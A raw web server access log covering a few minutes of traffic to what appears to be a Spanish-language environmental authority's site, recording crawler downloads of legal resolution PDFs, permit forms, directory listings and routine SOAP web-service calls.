186.154.191.116 - - [28/Jun/2024:03:28:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/H/QIbmcxmGRnnmsp+mT+vHY6+a0NPJpG3SNUKhY6NKsL5jerTL3hOXG9Cj3L3ujHEHWNOK+usk9SXPjckiPmU6LDpDZ40MsonKEKwyPNioxIrW7B6FDdnKBZ/wIivkg/x1sn6wGKwazv5GmUzg/677gBH9Qfc+nA=&u=U2FsdGVkX1/pJy7gy79deeRjtu19JayBBjbXo+1ovGMK6JnmZFc+zGjRmNwPHi+Y&y=U2FsdGVkX1+g/qpQw4ofdshCqOMayKtyZG2ZRBxskwnrwDIB1EGrPhJnc1++wvWC HTTP/1.1" 200 26
186.154.191.116 - - [28/Jun/2024:03:28:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18H9JuPvU6ecluXsgALwUT1y2pkuEyiKo0gfmh6i4vdQGygTl22hvZBEcV7yLJhdGVEt0g1ZWAGjLrSnlf5cQJ5vXKqRpF6YVJRPt+KFsOnap6+K8XSteml3NiMW3dvTkXU4qHSfoqvEkBncyshj52I9u8YgpShZvk=&u=U2FsdGVkX1/pJy7gy79deeRjtu19JayBBjbXo+1ovGMK6JnmZFc+zGjRmNwPHi+Y&y=U2FsdGVkX1+g/qpQw4ofdshCqOMayKtyZG2ZRBxskwnrwDIB1EGrPhJnc1++wvWC HTTP/1.1" 200 26
186.154.191.116 - - [28/Jun/2024:03:28:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/YNnIcOegihPK+9S3+BdESFbyjGsW3P/E21AJe34eV2L9tbp1h8O0Rb6wl0zpzk2vkWKFhqizyxUughKosX2pGX/QMkJZJh9Ed1bgXapA/TcXBV8aADPYYMXCVRPV6MHCmr9wUswN2v87YyaUFZ8VHc6QomEJNRsXpBzTrXVLgwy+7KdMWjW3oTZe1vqavooNpl7mogP0+Kg==&u=U2FsdGVkX1/pJy7gy79deeRjtu19JayBBjbXo+1ovGMK6JnmZFc+zGjRmNwPHi+Y&y=U2FsdGVkX1+g/qpQw4ofdshCqOMayKtyZG2ZRBxskwnrwDIB1EGrPhJnc1++wvWC HTTP/1.1" 200 26
201.245.192.253 - - [28/Jun/2024:03:28:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:28:18 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%201801-1850/&sort=name&order=asc HTTP/1.1" 200 12158
201.245.192.253 - - [28/Jun/2024:03:28:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
3.212.128.62 - - [28/Jun/2024:03:28:39 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.12 - - [28/Jun/2024:03:28:39 -0500] "GET /BLA/resoluciones/AUTOS%202023/2559.pdf HTTP/1.1" 200 2381685
66.249.66.11 - - [28/Jun/2024:03:28:40 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/9710.pdf HTTP/1.1" 200 408027
40.77.167.48 - - [28/Jun/2024:03:28:57 -0500] "GET /BLA/resoluciones/AUTOS%202023/0896.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:29:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:03:27:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:03:29:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [28/Jun/2024:03:29:22 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20101-150/&sort=name&order=asc HTTP/1.1" 200 12339
201.245.192.253 - - [28/Jun/2024:03:29:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35333
216.245.221.92 - - [28/Jun/2024:03:29:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Jun/2024:03:28:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
201.245.192.253 - - [28/Jun/2024:03:30:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:30:06 -0500] "GET /resoluciones/RESOLUCIONES%202008/4024.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [28/Jun/2024:03:30:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35513
66.249.66.11 - - [28/Jun/2024:03:30:22 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20601-650/&sort=size&order=asc HTTP/1.1" 200 12037
114.119.135.172 - - [28/Jun/2024:03:30:24 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2022/&sort=size&order=asc HTTP/1.1" 200 14291
201.245.192.253 - - [28/Jun/2024:03:31:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:31:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:03:31:23 -0500] "GET /BLA/resoluciones/AUTOS%202023/4735.pdf HTTP/1.1" 200 403196
66.249.66.12 - - [28/Jun/2024:03:31:23 -0500] "GET /autoliquidacion/Solicitud%20de%20expedici%C3%B3n%20de%20certificados%20de%20estado%20de%20conservaci%C3%B3n%20ambiental%20(CECA)/Circular%20tramite%20CECA.pdf HTTP/1.1" 200 168662
66.249.66.12 - - [28/Jun/2024:03:31:23 -0500] "GET /BLA/resoluciones/AUTOS%202023/4022.pdf HTTP/1.1" 200 1705876
66.249.66.13 - - [28/Jun/2024:03:31:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1614.pdf HTTP/1.1" 200 8938388
66.249.66.13 - - [28/Jun/2024:03:31:35 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%201651-1700/&sort=name&order=asc HTTP/1.1" 200 12155
66.249.66.17 - - [28/Jun/2024:03:31:40 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/1523.pdf HTTP/1.1" 200 340228
66.249.66.18 - - [28/Jun/2024:03:31:41 -0500] "GET /BLA/resoluciones/AUTOS%202023/05619.pdf HTTP/1.1" 304 -
66.249.66.15 - - [28/Jun/2024:03:31:48 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%201451-1500/&sort=size&order=desc HTTP/1.1" 200 12145
66.249.66.17 - - [28/Jun/2024:03:32:01 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%201451-1500/&sort=name&order=asc HTTP/1.1" 200 12146
172.22.2.4 - - [28/Jun/2024:03:32:02 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2012%20del%2028%20de%20Agosto%20de%202012.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:03:32:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.14 - - [28/Jun/2024:03:32:14 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%201651-1700/&sort=size&order=desc HTTP/1.1" 200 12154
66.249.66.14 - - [28/Jun/2024:03:32:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1444.pdf HTTP/1.1" 200 276794
201.245.192.253 - - [28/Jun/2024:03:33:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:33:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:03:33:27 -0500] "GET /autoliquidacion/Solicitud%20de%20expedici%C3%B3n%20de%20certificados%20de%20estado%20de%20conservaci%C3%B3n%20ambiental%20(CECA)/Formato%20Seguimiento%20al%20material%20vegetal%20plantado%202021.xlsx HTTP/1.1" 200 72637
172.22.2.4 - - [28/Jun/2024:03:33:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
201.245.192.253 - - [28/Jun/2024:03:33:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [28/Jun/2024:03:33:40 -0500] "GET /autoliquidacion/Solicitud%20de%20expedici%C3%B3n%20de%20certificados%20de%20estado%20de%20conservaci%C3%B3n%20ambiental%20(CECA)/Formulario%20de%20solicitud%20CECA%202021.pdf HTTP/1.1" 200 517926
35.84.118.171 - - [28/Jun/2024:03:33:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Jun/2024:03:33:45 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C-596-10.doc HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:33:53 -0500] "GET /autoliquidacion/Permiso%20de%20ocupaci%C3%B3n%20de%20cauce/PM04-PR36-F1%20Formulario%20de%20solicitud%20de%20permiso%20de%20ocupaci%C3%B3n%20de%20cauce,%20playas%20y%20lechos%20-%20lista%20de%20chequeo.xls HTTP/1.1" 200 95744
201.245.192.253 - - [28/Jun/2024:03:34:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:34:06 -0500] "GET /autoliquidacion/Permiso%20de%20ocupaci%C3%B3n%20de%20cauce/Aplicativo.html HTTP/1.1" 200 359
66.249.66.12 - - [28/Jun/2024:03:34:19 -0500] "GET /BLA/resoluciones/AUTOS%202023/05591.pdf HTTP/1.1" 200 507338
66.249.66.11 - - [28/Jun/2024:03:34:19 -0500] "GET /BLA/resoluciones/AUTOS%202023/05554.pdf HTTP/1.1" 200 2051799
66.249.66.11 - - [28/Jun/2024:03:34:19 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/&sort=size&order=desc HTTP/1.1" 200 26095
66.249.66.12 - - [28/Jun/2024:03:34:31 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%201801-1850/&sort=date&order=asc HTTP/1.1" 200 12158
216.245.221.92 - - [28/Jun/2024:03:34:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Jun/2024:03:33:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
